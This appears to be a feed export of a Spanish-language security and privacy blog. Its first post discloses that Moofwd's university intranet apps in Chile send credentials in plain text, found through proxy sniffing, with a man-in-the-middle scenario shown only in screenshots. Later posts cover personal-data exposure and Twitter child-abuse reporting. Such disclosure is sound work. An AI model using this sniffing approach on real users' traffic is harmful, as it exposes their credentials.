tag:blogger.com,1999:blog-70673705044709481592024-03-05T10:52:24.972-08:00Blogshinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.comBlogger85125tag:blogger.com,1999:blog-7067370504470948159.post-70636336293139241182017-02-11T10:53:00.000-08:002017-02-11T10:53:53.278-08:00Moofwd Mobile: Apps Moviles que transmiten credenciales en plano<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwLHrsfL1nsQlSJv5VbDvd1IIxP_Mx4PB4-SHdkUbeEXN21GT3Mejv03v9S00f5iV_1rlEOLoo62_541TQlk4-gXBUUFb7NVTixrs72pDB3bwCdiuNg11qhnjDgCU0yWhlelkRWapAKJkV/s1600/Captura+de+pantalla+2016-08-19+a+las+3.18.51+p.m..png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwLHrsfL1nsQlSJv5VbDvd1IIxP_Mx4PB4-SHdkUbeEXN21GT3Mejv03v9S00f5iV_1rlEOLoo62_541TQlk4-gXBUUFb7NVTixrs72pDB3bwCdiuNg11qhnjDgCU0yWhlelkRWapAKJkV/s1600/Captura+de+pantalla+2016-08-19+a+las+3.18.51+p.m..png" /></a></div>
<span style="font-family: "courier new" , "courier" , monospace;">Moofwd Inc. es una empresa desarrolladora de soluciones móviles con oficinas en Estados Unidos, India y Chile. Sus desarrollos apuntan a soluciones para Instituciones educacionales y comerciales.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Esta empresa es la responsable de varios desarrollos de apps moviles para uso de Intranet por parte del alumnado y empleados de distintas universidades en el mundo. Solo en Chile podemos identificar que sus app es utilizada por una variedad de casas educacionales.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfxINM9kNNHDD2gOmhbu7y8VZngpxro2Ya21QbVWp87zKxZYazxtmK42sBzzkCP9i8L3CIRTsY4G9T8nGA_byiShUYObxI8atlnQrbPsZ2Ub1KGKnZk2GU746rVsfbxM7VvuYVnTtlw1xQ/s1600/Captura+de+pantalla+2016-08-19+a+las+3.43.46+p.m..png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="93" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfxINM9kNNHDD2gOmhbu7y8VZngpxro2Ya21QbVWp87zKxZYazxtmK42sBzzkCP9i8L3CIRTsY4G9T8nGA_byiShUYObxI8atlnQrbPsZ2Ub1KGKnZk2GU746rVsfbxM7VvuYVnTtlw1xQ/s320/Captura+de+pantalla+2016-08-19+a+las+3.43.46+p.m..png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnLGY8PwR-RiIpcsicoZJL_zDWMr3jb9gZkkAi5y7MtMnP4V5BwulcD1DelrEqFTblBeL67EeHaxKTN9XCeoY_sBmVfu5gfDlCCMHVHvqDoitgkcWISlgWLBZwNKh46rUIMcKp-HLgY0a9/s1600/Captura+de+pantalla+2016-08-19+a+las+3.43.57+p.m..png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="95" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnLGY8PwR-RiIpcsicoZJL_zDWMr3jb9gZkkAi5y7MtMnP4V5BwulcD1DelrEqFTblBeL67EeHaxKTN9XCeoY_sBmVfu5gfDlCCMHVHvqDoitgkcWISlgWLBZwNKh46rUIMcKp-HLgY0a9/s320/Captura+de+pantalla+2016-08-19+a+las+3.43.57+p.m..png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnOVp-KE3SYPpZeotimWUPZTEnNKzCYlTbEPYz7Y58vPeLA1f13m26raCxbAdF2BrBALdBjqC2oWD0OSEvUDjQ0eOd50VJuQk3SmZMeEcJkKvDdAkkgjA8lNEbZqkL8QGa6TCvUDm5_uIU/s1600/Captura+de+pantalla+2016-08-19+a+las+4.02.41+p.m..png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="95" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnOVp-KE3SYPpZeotimWUPZTEnNKzCYlTbEPYz7Y58vPeLA1f13m26raCxbAdF2BrBALdBjqC2oWD0OSEvUDjQ0eOd50VJuQk3SmZMeEcJkKvDdAkkgjA8lNEbZqkL8QGa6TCvUDm5_uIU/s200/Captura+de+pantalla+2016-08-19+a+las+4.02.41+p.m..png" width="200" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: right;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;">- Universidad Andrés Bello</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;">- Universidad Santo Tomás</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;">- Instituto Profesional AIEP</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;">- Universidad de las Américas</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;">- Universidad de los Andes</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;">- Instituto Profesional Virginio Gomez</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;">- Instituto Profesional IACC</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;">- Instituto Profesi</span><span style="font-family: "courier new" , "courier" , monospace;">onal AIEP -Administración-</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;">- Instituto Guillermo Subercaseaux</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;">1.- Credenciales en Plano?</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;">De vez en cuando siempre me pongo a sniffear lo que sale de mis dispositivos y a ver las peticiones que hace una u otra app por curiosidad. Así fue como llegue a la app de una universidad con el fin de hacer una versión en perl para ver las notas <strike>cada loco con su tema</strike>, y al parecer las credenciales van en plano?.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;">Con </span><a href="https://www.charlesproxy.com/" style="font-family: 'Courier New', Courier, monospace;" target="_blank">CharlesProxy</a><span style="font-family: "courier new" , "courier" , monospace;">, un HTTP Proxy que nos permite hacer maravillas en cuanto a monitorear peticiones y respuestas (Entre otras cosas más), logré que mi móvil (iOS) se conectará a Internet mediante mi laptop en el puerto que CharlesProxy esta monitoreando. Asi todas las peticiones que realice mi movil se verán en la ventana del Proxy.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbGWwQeWCjRffkKIe9eOkX5zzqoGMHAFt33pAXugUVDicWY9gyqQuT6v5Ki3jhd2zt2ZD-pYZ2NBEjFaOYXPu0HDT9zqhP7zT6FWDIsV-nD-FqBZ6KazGJ2VJ4BXK_gwpSZT3Z7IeX3mwS/s1600/IMG_2150.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbGWwQeWCjRffkKIe9eOkX5zzqoGMHAFt33pAXugUVDicWY9gyqQuT6v5Ki3jhd2zt2ZD-pYZ2NBEjFaOYXPu0HDT9zqhP7zT6FWDIsV-nD-FqBZ6KazGJ2VJ4BXK_gwpSZT3Z7IeX3mwS/s400/IMG_2150.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJNFN8TIiyUGsqgaeeRZPZXsecGKtkS7PtXaqehsLyyY4ibtK2sI3DYe8JRW7f6m377CRU61w06ViSsjwLJDzWdUPe7_bhRhlnVHQTZMGD6_lXsl1jPHYfzjnIK7fj8mQbaTMDFyMlx_1o/s1600/IMG_2151.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="28" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJNFN8TIiyUGsqgaeeRZPZXsecGKtkS7PtXaqehsLyyY4ibtK2sI3DYe8JRW7f6m377CRU61w06ViSsjwLJDzWdUPe7_bhRhlnVHQTZMGD6_lXsl1jPHYfzjnIK7fj8mQbaTMDFyMlx_1o/s640/IMG_2151.JPG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;">Escenario: MitM con Ettercap + Wireshark: </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsy2i7fQuPIm_Pkm4N4POHp8J4-alqsmDqcA77VhoWjfqgD-RIX6OS0SUsV0ay3_y14xVygxEHuW_H1N_Jzq61FoK4lImUzkeGqOzzTIcdl8FHLFeTZt7icTmALyAyHAVTkmefpZOhiN2Y/s1600/IMG_2153.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsy2i7fQuPIm_Pkm4N4POHp8J4-alqsmDqcA77VhoWjfqgD-RIX6OS0SUsV0ay3_y14xVygxEHuW_H1N_Jzq61FoK4lImUzkeGqOzzTIcdl8FHLFeTZt7icTmALyAyHAVTkmefpZOhiN2Y/s400/IMG_2153.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;">Moofwd: Políticas de Privacidad -> Seguridad.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibyGSpaUuFxQ18Ye9PTtSZFaxBAf9gk__f_uZvP_-3HJWB3uWd7QfiCZhgHLFC5j8_G3Ll2tUeTaPBDOaA-aS1g2NIxwGfomUn9WZXdbZkEagFD2rDJjJAVw-MyIU0cpoGxDQ1Umodn0vA/s1600/Captura+de+pantalla+2016-08-20+a+las+1.02.15+p.m..png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibyGSpaUuFxQ18Ye9PTtSZFaxBAf9gk__f_uZvP_-3HJWB3uWd7QfiCZhgHLFC5j8_G3Ll2tUeTaPBDOaA-aS1g2NIxwGfomUn9WZXdbZkEagFD2rDJjJAVw-MyIU0cpoGxDQ1Umodn0vA/s640/Captura+de+pantalla+2016-08-20+a+las+1.02.15+p.m..png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>shinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.com0tag:blogger.com,1999:blog-7067370504470948159.post-61372191640513538472016-04-05T15:35:00.002-07:002016-08-19T09:34:58.721-07:00Concurso MissMundoExperto - en Datos Personales - <div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQdEhzhzxYykDmuAPszKLSCL96a0KHR2bpYaNYrhyphenhyphen4qGhu86AJecJS_zcpa_PrcyvnrFTqkQdu2-WUYUHdPB3UKFDs-eS5cDvuB9Bxm-P99mpKa-d7EXLK6Q8gOYm7Kgr1cuYT-08uQNWJ/s1600/Captura+de+pantalla+2016-03-29+a+las+5.09.31+p.m..png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQdEhzhzxYykDmuAPszKLSCL96a0KHR2bpYaNYrhyphenhyphen4qGhu86AJecJS_zcpa_PrcyvnrFTqkQdu2-WUYUHdPB3UKFDs-eS5cDvuB9Bxm-P99mpKa-d7EXLK6Q8gOYm7Kgr1cuYT-08uQNWJ/s320/Captura+de+pantalla+2016-03-29+a+las+5.09.31+p.m..png" width="320"></a></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br></span></div>
<span style="font-family: "courier new" , "courier" , monospace;"></span><br>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="font-family: "courier new" , "courier" , monospace;"><br></span></span></div>
<span style="font-family: "courier new" , "courier" , monospace;">
El concurso <b>Miss Mundo Experto</b>, es un concurso que realiza la empresa Easy en conjunto al Diario La Cuarta. <a href="http://www.mundoexperto.cl/n" target="_blank">Mundo experto</a> es el club de beneficios de la construcción que tiene Easy y todos los años se elige a la Miss que representara al club, donde a su vez se realizan actividades junto a maestros y trabajadores de la construcción. Por otro lado este concurso se toma gran parte de las redes sociales, donde las concursantes incentivan a sus seguidores a votar por ellas, el gran atractivo de las chicas es lo que produce que este concurso tenga gran cantidad de seguidores y que día a día se generen miles de menciones y publico promoviendo que voten por las concursantes.</span><br>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK6O0AnPfo7lMdWdZFdDFfZvg5ORt1PJEhwe9MM-AD3Ann_3KK9ZSGEH2PpWXlEpLnPW3oKmuDC413zUQE_2vYXvgzR5l9Cb2lb1HgXc10MKP7Ucne3mZE9-7E-DLpic1xtLTURjwboz3i/s1600/Captura+de+pantalla+2016-03-29+a+las+5.20.30+p.m..png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK6O0AnPfo7lMdWdZFdDFfZvg5ORt1PJEhwe9MM-AD3Ann_3KK9ZSGEH2PpWXlEpLnPW3oKmuDC413zUQE_2vYXvgzR5l9Cb2lb1HgXc10MKP7Ucne3mZE9-7E-DLpic1xtLTURjwboz3i/s320/Captura+de+pantalla+2016-03-29+a+las+5.20.30+p.m..png" width="320"></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg9efbOhb8W0Rwf-fn5odKUIWbGpaZuw4XMHy7usnR3iv_ZY_zwGjUmSHk6nK4aLYlJUbfN4ZzRvrptY23R6QhslZC7Z7RPpaCH8qqQq3Xa3rqLWUcopp8hiPX2J-7N2FOnI2rGMPgFAro/s1600/Captura+de+pantalla+2016-03-29+a+las+5.24.08+p.m..png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg9efbOhb8W0Rwf-fn5odKUIWbGpaZuw4XMHy7usnR3iv_ZY_zwGjUmSHk6nK4aLYlJUbfN4ZzRvrptY23R6QhslZC7Z7RPpaCH8qqQq3Xa3rqLWUcopp8hiPX2J-7N2FOnI2rGMPgFAro/s320/Captura+de+pantalla+2016-03-29+a+las+5.24.08+p.m..png" width="320"></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAHO5jThSaVwdFy1Ujnb58tSNx1hXjiXCVW-ROCsgQ6yjI3KrB-JRW3kVizaZVr3vHslUfIoNZFwN9dl5V10ZW1idECRYZaVM8PhzVHN4iZc8JcQoWl-oUPGp5EauwtjzpyiHz4roJwmDf/s1600/Captura+de+pantalla+2016-03-29+a+las+5.17.37+p.m..png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAHO5jThSaVwdFy1Ujnb58tSNx1hXjiXCVW-ROCsgQ6yjI3KrB-JRW3kVizaZVr3vHslUfIoNZFwN9dl5V10ZW1idECRYZaVM8PhzVHN4iZc8JcQoWl-oUPGp5EauwtjzpyiHz4roJwmDf/s320/Captura+de+pantalla+2016-03-29+a+las+5.17.37+p.m..png" width="320"></a></div>
<br>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxCXYL3Rg4YTpNQusybndKfrnjUnysJh0DnK3yr8ubi5t0Vdb1tl7U699tc3rRlRac7SL-d17ZTqJMgNbWyunHQBjVs6WItZeTT21wtLo1d7m_RuoxjP_PtrAJ9dXreLpRk5nOz48vcHl5/s1600/Captura+de+pantalla+2016-03-29+a+las+5.18.42+p.m..png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxCXYL3Rg4YTpNQusybndKfrnjUnysJh0DnK3yr8ubi5t0Vdb1tl7U699tc3rRlRac7SL-d17ZTqJMgNbWyunHQBjVs6WItZeTT21wtLo1d7m_RuoxjP_PtrAJ9dXreLpRk5nOz48vcHl5/s320/Captura+de+pantalla+2016-03-29+a+las+5.18.42+p.m..png" width="314"></a></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"></span><br>
</div><a href="http://xshinee.blogspot.com/2016/04/concurso-missmundoexperto-en-datos.html#more">Seguir Leyendo >></a>shinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.com0tag:blogger.com,1999:blog-7067370504470948159.post-23513182679195681012016-01-19T11:22:00.000-08:002016-02-04T07:38:13.229-08:00Twitter & Abuso de Menores: Usuario en CL<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG1-c1GUQXFuBm6tI1fwNC2sZt-3OUs7FvoQc6Iadgq0sNWzsVxOzPDhq4lxQZNXaq8NRZOCdQMzklmvNGUK7olsxRu_WXAjuOa6Ki0CFJbmJ_oNYs5JwbrSS00zboYYSQ2e_0WJUlSyfR/s1600/Safety.Stop-Child-Abuse.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG1-c1GUQXFuBm6tI1fwNC2sZt-3OUs7FvoQc6Iadgq0sNWzsVxOzPDhq4lxQZNXaq8NRZOCdQMzklmvNGUK7olsxRu_WXAjuOa6Ki0CFJbmJ_oNYs5JwbrSS00zboYYSQ2e_0WJUlSyfR/s200/Safety.Stop-Child-Abuse.jpg" width="193"></a></div>
<br>
<span style="font-family: "courier new" , "courier" , monospace;"><br></span>
<span style="font-family: "courier new" , "courier" , monospace;"><br></span>
<span style="font-family: "courier new" , "courier" , monospace;">Primero que todo quiero establecer - para que no haya confusión - que me durante toda esta publicación que cuando hablo de material de Abuso de Menores me refiero específicamente a <strike>Pornografía Infantil,</strike> una vez establecido esto es hora de continuar.</span><br>
<span style="font-family: "courier new" , "courier" , monospace;"><br></span>
<span style="font-family: "courier new" , "courier" , monospace;"><br></span>
<span style="font-family: "courier new" , "courier" , monospace;">Ya hablamos de que <a href="http://blog.xshinee.cl/2015/12/twitter-esta-fallando-en-la-lucha.html" target="_blank">"Twitter esta fallando en la lucha contra el abuso a menores"</a> en la publicación anterior, sin embargo quedan muchas aristas que discutir y establecer.</span><br>
<span style="font-family: "courier new" , "courier" , monospace;"><br></span>
<span style="font-family: "courier new" , "courier" , monospace;">Para dar un poco de contexto, el día de ayer mientras me encontraba reportando cuentas de abuso de menores en Twitter, y luego de leer nuevamente la <a href="https://support.twitter.com/articles/72684" target="_blank">"Política de explotación sexual de menores"</a> puedo resumir que:</span><br>
<span style="font-family: "courier new" , "courier" , monospace;"><br></span>
<br>
<ul>
<li><span style="font-family: "courier new" , "courier" , monospace;">Twitter NO tolera la explotación sexual de menores.</span></li>
<li><span style="font-family: "courier new" , "courier" , monospace;">Cuando toman conocimiento de material que promueve la explotación sexual a menores son retirados del sitio.</span></li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><i><b>Es reportado también a NCMEC ( National Center for Missing & Exploited Children )</b></i></span></li>
</ul>
<div>
<br></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">Al parecer es reportado a una entidad que trabaja en cercanía de otras instituciones de ley: NCMEC "<span style="background-color: white; color: #0c2c43;">Provide all information to the appropriate law enforcement agency for potential investigation".</span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white; color: #0c2c43;"><br></span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"><span style="color: #0c2c43;"><b>Ayer mientras navegaba en twitter</b> me encontré con una de estas cuentas, en resumen: Gran número de seguidores, gran numero de fotos y videos, correos de contacto e incluso alusión a dirección de un blog (blogger). Además se podía concluir que participaba en intercambio de material de manera bastante organizada (publicaba carátulas de DVD, que contenían una especie de collage de Abuso a menores. </span></span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"><span style="color: #0c2c43;"></span></span></span><br>
</div><a href="http://xshinee.blogspot.com/2016/01/twitter-abuso-de-menores-usuario-en-cl.html#more">Seguir Leyendo >></a>shinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.com4tag:blogger.com,1999:blog-7067370504470948159.post-19951709854068565492015-12-27T08:37:00.001-08:002016-02-04T07:38:34.505-08:00Twitter está fallando en la lucha contra el abuso a menores<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5PqjCa9EJH_rxs84U_IntzQCgR-lr5uRL2aLVEBCqOaT4Z-hj_838zb3xelw8cLfUxLV3cR8IC0a3wEM23pLWlAfP-ydWOzqbrbEVNDJw9sI67NgoQChijJSceW3MMVXh4bHWTDl3kT6E/s1600/twitter-new-rules-against-abuse.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5PqjCa9EJH_rxs84U_IntzQCgR-lr5uRL2aLVEBCqOaT4Z-hj_838zb3xelw8cLfUxLV3cR8IC0a3wEM23pLWlAfP-ydWOzqbrbEVNDJw9sI67NgoQChijJSceW3MMVXh4bHWTDl3kT6E/s320/twitter-new-rules-against-abuse.jpg" width="320"></a></div>
<br>
<br>
<span style="font-family: "courier new" , "courier" , monospace; font-size: large;"><b>Twitter esta fallando en la lucha contra el abuso a menores.-</b> </span><br>
<span style="font-family: "courier new" , "courier" , monospace;"><br></span>
<span style="font-family: "courier new" , "courier" , monospace;"><br></span>
<span style="font-family: "courier new" , "courier" , monospace;">Primero que todo quiero compartir con ustedes la siguiente aclaración tomada desde la página de la <a href="http://www.interpol.int/Crime-areas/Crimes-against-children/Appropriate-terminology" target="_blank">Interpol</a>.</span><br>
<span style="font-family: "courier new" , "courier" , monospace;">Es muy común oír o leer cuando hablan de Pornografía Infantil en los medios de comunicación, redes sociales o inclusos nosotros mismos(me incluyo), sin embargo hace un tiempo se lleva a cabo una campaña en la cual <b>buscan terminar con el uso de termino "Pornografía Infantil" </b>cuando hablamos de imágenes que describen el abuso sexual de un menor. </span><br>
<span style="font-family: "courier new" , "courier" , monospace;"><br></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: large;"><b>El abuso a menores, no es pornografía</b></span><br>
<span style="font-family: "courier new" , "courier" , monospace;"><br></span>
<span style="font-family: "courier new" , "courier" , monospace;">Una imagen sexual de un menor, es "abuso" o "explotación", y no debe jamás ser descrito como "pornografía"</span><br>
<span style="font-family: "courier new" , "courier" , monospace;"><br></span>
<span style="font-family: "courier new" , "courier" , monospace;">La pornografía es un término usado para los adultos que participan en actos sexuales consensuales distribuidos (</span><span style="font-family: "courier new" , "courier" , monospace;">su mayoría)legalmente al público en general para su placer sexual.</span><br>
<span style="font-family: "courier new" , "courier" , monospace;"><br></span>
<span style="font-family: "courier new" , "courier" , monospace;">Jamás debemos olvidar que las imágenes de abuso infantil, son documentos de prueba de un delito en curso, <b>un niño siendo víctima de un abuso sexual</b>.</span><br>
<span style="font-family: "courier new" , "courier" , monospace;"></span><br>
<a href="http://xshinee.blogspot.com/2015/12/twitter-esta-fallando-en-la-lucha.html#more">Seguir Leyendo >></a>shinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.com0tag:blogger.com,1999:blog-7067370504470948159.post-51612238281519733262015-11-22T06:37:00.000-08:002016-02-04T07:39:16.647-08:00Privacidad hoy en día | Registro Civil ?<br>
<br>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsvmf7RuubzBcVxRWJrKIj1SuQP6XbS29jxfAdtzwfdQB1AjJfLQqZcKtcJ_fzgc5p66E5kWVHnu-iefIA01abUnZEjTiFKlAZEPu8xPAww9tXxCwqw2ByQKqBQgFY1zHi4R5onVsqybnG/s1600/final.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsvmf7RuubzBcVxRWJrKIj1SuQP6XbS29jxfAdtzwfdQB1AjJfLQqZcKtcJ_fzgc5p66E5kWVHnu-iefIA01abUnZEjTiFKlAZEPu8xPAww9tXxCwqw2ByQKqBQgFY1zHi4R5onVsqybnG/s400/final.png" width="400"></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><br></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;">Creo que <b>la privacidad quedó en el pasado</b> - <strike>aun muchos siguen luchando por que no sea así</strike> - pareciera que para el común de la gente fuese normal que su <b>información personal pueda ser expuesta</b> a cualquier persona en el mundo. Ya es sabido que el Registro Civil chileno ha pasado por diversas situaciones cuestionables en cuanto a privacidad, recordar que aunque <a href="http://www.leychile.cl/Navegar?idNorma=29951" target="_new" title="Ley publicacion padron electoral">obligado por una ley</a>,puso a disposición de todos la información de aproximadamente 13 millones de chilenos correspondiente al padrón electoral y hasta el día de hoy los pdfs andan rondando en cualquier parte del mundo o cuando denunciaron el robo de una base de datos <a href="http://www.latercera.com/noticia/nacional/2014/03/680-570673-9-registro-civil-denuncia-copia-irregular-de-bases-de-datos-de-carnes-y-pasaportes.shtml" target="_blank">"</a></span><span style="font-family: "courier new" , "courier" , monospace;"><a href="http://www.latercera.com/noticia/nacional/2014/03/680-570673-9-registro-civil-denuncia-copia-irregular-de-bases-de-datos-de-carnes-y-pasaportes.shtml" target="_blank">Registro Civil denuncia copia irregular de bases de datos de carnés y pasaportes"</a> , bueno de esos hay varios casos y no vale la pena recordarlo todos. No siempre es necesario un fallo informático o una gran vulnerabilidad explotada, sino que "fallas" o "descuidos" humanos también son una gran fuente de exposición de datos personales. </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><br></span></div>
<div class="separator" style="clear: both; text-align: left;">
